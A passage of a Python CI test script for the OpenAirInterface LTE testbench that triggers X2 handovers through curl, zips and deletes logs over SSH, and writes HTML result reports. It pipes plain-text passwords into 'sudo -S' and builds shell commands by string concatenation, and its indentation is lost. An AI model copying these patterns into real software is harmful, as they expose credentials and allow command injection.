ueIdx += 1
cnt += 1
return message
def Perform_X2_Handover(self):
html_queue = SimpleQueue()
fullMessage = '<pre style="background-color:white">'
msg = 'Doing X2 Handover w/ option ' + self.x2_ho_options
logging.debug(msg)
fullMessage += msg + '\n'
if self.x2_ho_options == 'network':
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.x2ENBBsIds.append([])
self.x2ENBBsIds.append([])
self.x2ENBConnectedUEs.append([])
self.x2ENBConnectedUEs.append([])
fullMessage += self.X2_Status(0, self.testCase_id + '_pre_ho.json')
msg = "Activating the X2 Net control on each eNB"
logging.debug(msg)
fullMessage += msg + '\n'
eNB_cnt = self.x2NbENBs
cnt = 0
while cnt < eNB_cnt:
cmd = "curl --silent -XPOST http://" + self.EPCIPAddress + ":9999/rrc/x2_ho_net_control/enb/" + str(self.x2ENBBsIds[0][cnt]) + "/1"
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
cnt += 1
# Waiting for the activation to be active
time.sleep(20)
msg = "Switching UE(s) from eNB to eNB"
logging.debug(msg)
fullMessage += msg + '\n'
cnt = 0
while cnt < eNB_cnt:
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[0][cnt]):
cmd = "curl --silent -XPOST http://" + self.EPCIPAddress + ":9999/rrc/ho/senb/" + str(self.x2ENBBsIds[0][cnt]) + "/ue/" + str(self.x2ENBConnectedUEs[0][cnt][ueIdx]) + "/tenb/" + str(self.x2ENBBsIds[0][eNB_cnt - cnt - 1])
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
ueIdx += 1
cnt += 1
time.sleep(20)
# check
logging.debug("Checking the Status after X2 Handover")
fullMessage += self.X2_Status(1, self.testCase_id + '_post_ho.json')
cnt = 0
x2Status = True
while cnt < eNB_cnt:
if len(self.x2ENBConnectedUEs[0][cnt]) == len(self.x2ENBConnectedUEs[1][cnt]):
x2Status = False
cnt += 1
if x2Status:
msg = "X2 Handover was successful"
logging.debug(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
msg = "X2 Handover FAILED"
logging.error(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRow('Cannot perform requested X2 Handover', 'KO', ALL_PROCESSES_OK)
def LogCollectBuild(self):
if (self.eNBIPAddress != '' and self.eNBUserName != '' and self.eNBPassword != ''):
IPAddress = self.eNBIPAddress
UserName = self.eNBUserName
Password = self.eNBPassword
SourceCodePath = self.eNBSourceCodePath
elif (self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != ''):
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
SourceCodePath = self.UESourceCodePath
else:
sys.exit('Insufficient Parameter')
self.open(IPAddress, UserName, Password)
self.command('cd ' + SourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('rm -f build.log.zip', '\$', 5)
self.command('zip build.log.zip build_log_*/*', '\$', 60)
self.close()
def LogCollecteNB(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -f enb.log.zip', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S zip enb.log.zip enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 60)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 5)
self.close()
def LogCollectPing(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f ping.log.zip', '\$', 5)
self.command('zip ping.log.zip ping*.log', '\$', 60)
self.command('rm ping*.log', '\$', 5)
self.close()
def LogCollectIperf(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f iperf.log.zip', '\$', 5)
self.command('zip iperf.log.zip iperf*.log', '\$', 60)
self.command('rm iperf*.log', '\$', 5)
self.close()
def LogCollectHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f hss.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip hss.log.zip hss*.log', '\$', 60)
self.command('rm hss*.log', '\$', 5)
else:
self.command('cp /opt/hss_sim0609/hss.log .', '\$', 60)
self.command('zip hss.log.zip hss.log', '\$', 60)
self.close()
def LogCollectMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f mme.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip mme.log.zip mme*.log', '\$', 60)
self.command('rm mme*.log', '\$', 5)
else:
self.command('cp /opt/ltebox/var/log/*Log.0 .', '\$', 5)
self.command('zip mme.log.zip mmeLog.0 s1apcLog.0 s1apsLog.0 s11cLog.0 libLog.0 s1apCodecLog.0', '\$', 60)
self.close()
def LogCollectSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f spgw.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip spgw.log.zip spgw*.log', '\$', 60)
self.command('rm spgw*.log', '\$', 5)
else:
self.command('cp /opt/ltebox/var/log/xGwLog.0 .', '\$', 5)
self.command('zip spgw.log.zip xGwLog.0', '\$', 60)
self.close()
def LogCollectOAIUE(self):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -f ue.log.zip', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S zip ue.log.zip ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 60)
self.command('echo ' + self.UEPassword + ' | sudo -S rm ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 5)
self.close()
def RetrieveSystemVersion(self, machine):
if self.eNBIPAddress == 'none' or self.UEIPAddress == 'none':
self.OsVersion = 'Ubuntu 16.04.5 LTS'
self.KernelVersion = '4.15.0-45-generic'
self.UhdVersion = '3.13.0.1-0'
self.UsrpBoard = 'B210'
self.CpuNb = '4'
self.CpuModel = 'Intel(R) Core(TM) i5-6200U'
self.CpuMHz = '2399.996 MHz'
return 0
if machine == 'eNB':
if self.eNBIPAddress != '' and self.eNBUserName != '' and self.eNBPassword != '':
IPAddress = self.eNBIPAddress
UserName = self.eNBUserName
Password = self.eNBPassword
else:
return -1
if machine == 'UE':
if self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != '':
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
else:
return -1
self.open(IPAddress, UserName, Password)
self.command('lsb_release -a', '\$', 5)
result = re.search('Description:\\\\t(?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', str(self.ssh.before))
if result is not None:
self.OsVersion = result.group('os_type')
logging.debug('OS is: ' + self.OsVersion)
self.command('uname -r', '\$', 5)
result = re.search('uname -r\\\\r\\\\n(?P<kernel_version>[a-zA-Z0-9\-\_\.]+)', str(self.ssh.before))
if result is not None:
self.KernelVersion = result.group('kernel_version')
logging.debug('Kernel Version is: ' + self.KernelVersion)
self.command('dpkg --list | egrep --color=never libuhd003', '\$', 5)
result = re.search('libuhd003:amd64 *(?P<uhd_version>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.UhdVersion = result.group('uhd_version')
logging.debug('UHD Version is: ' + self.UhdVersion)
self.command('echo ' + Password + ' | sudo -S uhd_find_devices', '\$', 15)
result = re.search('product: (?P<usrp_board>[0-9A-Za-z]+)\\\\r\\\\n', str(self.ssh.before))
if result is not None:
self.UsrpBoard = result.group('usrp_board')
logging.debug('USRP Board is: ' + self.UsrpBoard)
self.command('lscpu', '\$', 5)
result = re.search('CPU\(s\): *(?P<nb_cpus>[0-9]+).*Model name: *(?P<model>[a-zA-Z0-9\-\_\.\ \(\)]+).*CPU MHz: *(?P<cpu_mhz>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.CpuNb = result.group('nb_cpus')
logging.debug('nb_cpus: ' + self.CpuNb)
self.CpuModel = result.group('model')
logging.debug('model: ' + self.CpuModel)
self.CpuMHz = result.group('cpu_mhz') + ' MHz'
logging.debug('cpu_mhz: ' + self.CpuMHz)
self.close()
#-----------------------------------------------------------
# HTML Reporting....
#-----------------------------------------------------------
def CreateHtmlHeader(self):
if (not self.htmlHeaderCreated):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1m Creating HTML header \u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
self.htmlFile = open('test_results.html', 'w')
self.htmlFile.write('<!DOCTYPE html>\n')
self.htmlFile.write('<html class="no-js" lang="en-US">\n')
self.htmlFile.write('<head>\n')
self.htmlFile.write(' <meta name="viewport" content="width=device-width, initial-scale=1">\n')
self.htmlFile.write(' <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">\n')
self.htmlFile.write(' <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\n')
self.htmlFile.write(' <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>\n')
self.htmlFile.write(' <title>Test Results for TEMPLATE_JOB_NAME job build #TEMPLATE_BUILD_ID</title>\n')
self.htmlFile.write('</head>\n')
self.htmlFile.write('<body><div class="container">\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <table style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <tr style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <a href="http://www.openairinterface.org/">\n')
self.htmlFile.write(' <img src="http://www.openairinterface.org/wp-content/uploads/2016/03/cropped-oai_final_logo2.png" alt="" border="none" height=50 width=150>\n')
self.htmlFile.write(' </img>\n')
self.htmlFile.write(' </a>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none; vertical-align: center;">\n')
self.htmlFile.write(' <b><font size = "6">Job Summary -- Job: TEMPLATE_JOB_NAME -- Build-ID: TEMPLATE_BUILD_ID</font></b>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <div class="alert alert-info"><strong> <span class="glyphicon glyphicon-dashboard"></span> TEMPLATE_STAGE_NAME</strong></div>\n')
self.htmlFile.write(' <table border = "1">\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-time"></span> Build Start Time (UTC) </td>\n')
self.htmlFile.write(' <td>TEMPLATE_BUILD_TIME</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-cloud-upload"></span> GIT Repository </td>\n')
self.htmlFile.write(' <td><a href="' + self.ranRepository + '">' + self.ranRepository + '</a></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-wrench"></span> Job Trigger </td>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td>Merge-Request</td>\n')
else:
self.htmlFile.write(' <td>Push to Branch</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-out"></span> Source Branch </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tree-deciduous"></span> Branch</td>\n')
self.htmlFile.write(' <td>' + self.ranBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Source Commit ID </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Commit ID </td>\n')
self.htmlFile.write(' <td>' + self.ranCommitID + '</td>\n')
self.htmlFile.write(' </tr>\n')
if self.ranAllowMerge != '':
commit_message = subprocess.check_output("git log -n1 --pretty=format:\"%s\" " + self.ranCommitID, shell=True, universal_newlines=True)
commit_message = commit_message.strip()
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Source Commit Message </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Commit Message </td>\n')
self.htmlFile.write(' <td>' + commit_message + '</td>\n')
self.htmlFile.write(' </tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-in"></span> Target Branch </td>\n')
if (self.ranTargetBranch == ''):
self.htmlFile.write(' <td>develop</td>\n')
else:
self.htmlFile.write(' <td>' + self.ranTargetBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
if (self.ADBIPAddress != 'none'):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
self.htmlUEConnected = len(self.UEDevices)
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' UE(s) is(are) connected to ADB bench server</h2>\n')
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.CatMDevices)) + ' CAT-M UE(s) is(are) connected to bench server</h2>\n')
else:
self.UEDevices.append('OAI-UE')
self.htmlUEConnected = len(self.UEDevices)
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' OAI UE(s) is(are) connected to CI bench</h2>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <ul class="nav nav-pills">\n')
count = 0
while (count < self.nbTestXMLfiles):
pillMsg = ' <li><a data-toggle="pill" href="#'
pillMsg += self.htmlTabRefs[count]
pillMsg += '">'
pillMsg += '__STATE_' + self.htmlTabNames[count] + '__'
pillMsg += self.htmlTabNames[count]
pillMsg += ' <span class="glyphicon glyphicon-'
pillMsg += self.htmlTabIcons[count]
pillMsg += '"></span></a></li>\n'
self.htmlFile.write(pillMsg)
count += 1
self.htmlFile.write(' </ul>\n')
self.htmlFile.write(' <div class="tab-content">\n')
self.htmlFile.close()
def CreateHtmlTabHeader(self):
if (not self.htmlHeaderCreated):
if (not os.path.isfile('test_results.html')):
self.CreateHtmlHeader()
self.htmlFile = open('test_results.html', 'a')
if (self.nbTestXMLfiles == 1):
self.htmlFile.write(' <div id="' + self.htmlTabRefs[0] + '" class="tab-pane fade">\n')
self.htmlFile.write(' <h3>Test Summary for <span class="glyphicon glyphicon-file"></span> ' + self.testXMLfiles[0] + '</h3>\n')
else:
self.htmlFile.write(' <div id="build-tab" class="tab-pane fade">\n')
self.htmlFile.write(' <table class="table" border = "1">\n')
self.htmlFile.write(' <tr bgcolor = "#33CCFF" >\n')
self.htmlFile.write(' <th>Test Id</th>\n')
self.htmlFile.write(' <th>Test Desc</th>\n')
self.htmlFile.write(' <th>Test Options</th>\n')
self.htmlFile.write(' <th>Test Status</th>\n')
if (self.htmlUEConnected == -1):
terminate_ue_flag = True
if (self.ADBIPAddress != 'none'):
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
else:
self.UEDevices.append('OAI-UE')
self.htmlUEConnected = len(self.UEDevices)
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <th>UE' + str(i) + ' Status</th>\n')
i += 1
self.htmlFile.write(' </tr>\n')
self.htmlHeaderCreated = True
def CreateHtmlTabFooter(self, passStatus):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th bgcolor = "#33CCFF" colspan=2>Final Tab Status</th>\n')
if passStatus:
self.htmlFile.write(' <th bgcolor = "green" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">PASS <span class="glyphicon glyphicon-ok"></span> </font></th>\n')
else:
self.htmlFile.write(' <th bgcolor = "red" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' </div>\n')
self.htmlFile.close()
time.sleep(1)
if passStatus:
cmd = "sed -i -e 's/__STATE_" + self.htmlTabNames[0] + "__//' test_results.html"
subprocess.run(cmd, shell=True)
else:
cmd = "sed -i -e 's/__STATE_" + self.htmlTabNames[0] + "__/<span class=\"glyphicon glyphicon-remove\"><\/span>/' test_results.html"
subprocess.run(cmd, shell=True)
self.htmlFooterCreated = False
def CreateHtmlFooter(self, passStatus):
if (os.path.isfile('test_results.html')):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1m Creating HTML footer \u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
self.htmlFile = open('test_results.html', 'a')
self.htmlFile.write('</div>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <table class="table table-condensed">\n')
machines = [ 'eNB', 'UE' ]
for machine in machines:
res = self.RetrieveSystemVersion(machine)
if res == -1:
continue
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=8>' + str(machine) + ' Server Characteristics</th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>OS Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.OsVersion + '</span></td>\n')
self.htmlFile.write(' <td>Kernel Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.KernelVersion + '</span></td>\n')
self.htmlFile.write(' <td>UHD Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.UhdVersion + '</span></td>\n')
self.htmlFile.write(' <td>USRP Board</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.UsrpBoard + '</span></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>Nb CPUs</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuNb + '</span></td>\n')
self.htmlFile.write(' <td>CPU Model Name</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuModel + '</span></td>\n')
self.htmlFile.write(' <td>CPU Frequency</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuMHz + '</span></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=5 bgcolor = "#33CCFF">Final Status</th>\n')
if passStatus:
self.htmlFile.write(' <th colspan=3 bgcolor="green"><font color="white">PASS <span class="glyphicon glyphicon-ok"></span></font></th>\n')
else:
self.htmlFile.write(' <th colspan=3 bgcolor="red"><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <div class="well well-lg">End of Test Report -- Copyright <span class="glyphicon glyphicon-copyright-mark"></span> 2018 <a href="http://www.openairinterface.org/">OpenAirInterface</a>. All Rights Reserved.</div>\n')
self.htmlFile.write('</div></body>\n')
self.htmlFile.write('</html>\n')
self.htmlFile.close()
def CreateHtmlTestRow(self, options, status, processesStatus, machine='eNB'):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
if (processesStatus == 0):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
elif (processesStatus == ENB_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process not found</td>\n')
elif (processesStatus == OAI_UE_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - OAI UE process not found</td>\n')
elif (processesStatus == ENB_PROCESS_SEG_FAULT):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process ended in Segmentation Fault</td>\n')
elif (processesStatus == ENB_PROCESS_ASSERTION) or (processesStatus == OAI_UE_PROCESS_ASSERTION):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process ended in Assertion</td>\n')
elif (processesStatus == ENB_PROCESS_REALTIME_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process faced Real Time issue(s)</td>\n')
elif (processesStatus == ENB_PROCESS_NOLOGFILE_TO_ANALYZE) or (processesStatus == OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE):
self.htmlFile.write(' <td bgcolor = "orange" >OK?</td>\n')
elif (processesStatus == ENB_PROCESS_SLAVE_RRU_NOT_SYNCED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' Slave RRU could not synch</td>\n')
elif (processesStatus == OAI_UE_PROCESS_COULD_NOT_SYNC):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - UE could not sync</td>\n')
elif (processesStatus == HSS_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - HSS process not found</td>\n')
elif (processesStatus == MME_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - MME process not found</td>\n')
elif (processesStatus == SPGW_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - SPGW process not found</td>\n')
elif (processesStatus == UE_IP_ADDRESS_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - Could not retrieve UE IP address</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
if (len(str(self.htmleNBFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Reestablishment|Could not copy eNB logfile', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' + cellBgColor + '">' + self.htmleNBFailureMsg + '</pre></td>\n')
self.htmleNBFailureMsg = ''
elif (len(str(self.htmlUEFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmlUEFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Could not copy UE logfile|oaitun_ue1 interface is either NOT mounted or NOT configured', self.htmlUEFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' + cellBgColor + '">' + self.htmlUEFailureMsg + '</pre></td>\n')
self.htmlUEFailureMsg = ''
else:
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
def CreateHtmlTestRowQueue(self, options, status, ue_status, ue_queue):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
addOrangeBK = False
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
addOrangeBK = True
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
i = 0
while (i < self.htmlUEConnected):
if (i < ue_status):
if (not ue_queue.empty()):
if (addOrangeBK):
self.htmlFile.write(' <td bgcolor = "orange" >' + str(ue_queue.get()).replace('white', 'orange') + '</td>\n')
else:
self.htmlFile.write(' <td>' + str(ue_queue.get()) + '</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
#-----------------------------------------------------------
# ShowTestID()
#-----------------------------------------------------------
def ShowTestID(self):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1mTest ID:' + self.testCase_id + '\u001B[0m')
logging.debug('\u001B[1m' + self.desc + '\u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
#-----------------------------------------------------------
# Usage()
#-----------------------------------------------------------
def Usage():
print('------------------------------------------------------------')
print('main.py Ver:' + Version)
print('------------------------------------------------------------')
print('Usage: python main.py [options]')
print(' --help Show this help.')
print(' --mode=[Mode]')
print(' TesteNB')
print(' InitiateHtml, FinalizeHtml')
print(' TerminateeNB, TerminateUE, TerminateHSS, TerminateMME, TerminateSPGW')
print(' LogCollectBuild, LogCollecteNB, LogCollectHSS, LogCollectMME, LogCollectSPGW, LogCollectPing, LogCollectIperf')
print(' --eNBRepository=[eNB\'s Repository URL] or --ranRepository=[OAI RAN Repository URL]')
print(' --eNBBranch=[eNB\'s Branch Name] or --ranBranch=[OAI RAN Repository Branch')
print(' --eNBCommitID=[eNB\'s Commit Number] or --ranCommitID=[OAI RAN Repository Commit SHA-1')
print(' --eNB_AllowMerge=[eNB\'s Allow Merge Request (with target branch)] or --ranAllowMerge=true/false')
print(' --eNBTargetBranch=[eNB\'s Target Branch in case of a Merge Request] or --ranTargetBranch=[Target Branch]')
print(' --eNBIPAddress=[eNB\'s IP Address]')
print(' --eNBUserName=[eNB\'s Login User Name]')
print(' --eNBPassword=[eNB\'s Login Password]')
print(' --eNBSourceCodePath=[eNB\'s Source Code Path]')
print(' --EPCIPAddress=[EPC\'s IP Address]')
print(' --EPCUserName=[EPC\'s Login User Name]')
print(' --EPCPassword=[EPC\'s Login Password]')
print(' --EPCSourceCodePath=[EPC\'s Source Code Path]')
print(' --EPCType=[EPC\'s Type: OAI or ltebox]')
print(' --ADBIPAddress=[ADB\'s IP Address]')
print(' --ADBUserName=[ADB\'s Login User Name]')
print(' --ADBPassword=[ADB\'s Login Password]')
print(' --XMLTestFile=[XML Test File to be run]')
print('------------------------------------------------------------')
def CheckClassValidity(action,id):
if action != 'Build_eNB' and action != 'WaitEndBuild_eNB' and action != 'Initialize_eNB' and action != 'Terminate_eNB' and action != 'Initialize_UE' and action != 'Terminate_UE' and action != 'Attach_UE' and action != 'Detach_UE' and action != 'Build_OAI_UE' and action != 'Initialize_OAI_UE' and action != 'Terminate_OAI_UE' and action != 'DataDisable_UE' and action != 'DataEnable_UE' and action != 'CheckStatusUE' and action != 'Ping' and action != 'Iperf' and action != 'Reboot_UE' and action != 'Initialize_FlexranCtrl' and action != 'Terminate_FlexranCtrl' and action != 'Initialize_HSS' and action != 'Terminate_HSS' and action != 'Initialize_MME' and action != 'Terminate_MME' and action != 'Initialize_SPGW' and action != 'Terminate_SPGW' and action != 'Initialize_CatM_module' and action != 'Terminate_CatM_module' and action != 'Attach_CatM_module' and action != 'Detach_CatM_module' and action != 'Ping_CatM_module' and action != 'IdleSleep' and action != 'Perform_X2_Handover':
logging.debug('ERROR: test-case ' + id + ' has wrong class ' + action)
return False
return True
def GetParametersFromXML(action):
if action == 'Build_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
xmlBgBuildField = test.findtext('backgroundBuild')
if (xmlBgBuildField is None):
SSH.backgroundBuild = False
else:
if re.match('true', xmlBgBuildField, re.IGNORECASE):
SSH.backgroundBuild = True
else:
SSH.backgroundBuild = False
if action == 'WaitEndBuild_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
